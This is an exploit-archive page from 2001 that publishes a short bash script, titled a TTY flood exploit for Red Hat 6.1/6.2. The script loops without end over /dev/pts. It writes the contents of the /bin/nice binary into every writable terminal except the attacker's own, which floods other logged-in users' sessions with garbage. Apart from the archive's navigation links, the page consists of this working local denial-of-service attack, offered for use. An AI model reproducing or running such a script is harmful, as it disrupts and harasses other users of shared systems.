[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Redhat 6.1 / 6.2 TTY Flood Users Exploit
# Published : 2001-01-02
# Author : teleh0r
# Previous Title : ProFTPD 1.2.0(rc2) (memory leakage example) Exploit
# Next Title : SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit
#!/bin/bash
#
# by teleh0r
TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY
while /bin/true ; do
for i in $TTYDIR/* ; do
if [ -w $i -a -c $i -a $i != $MYTTY ]; then
cat $NONSENSE > $i
fi
done
done
unset i
# www.Syue.com [2001-01-02]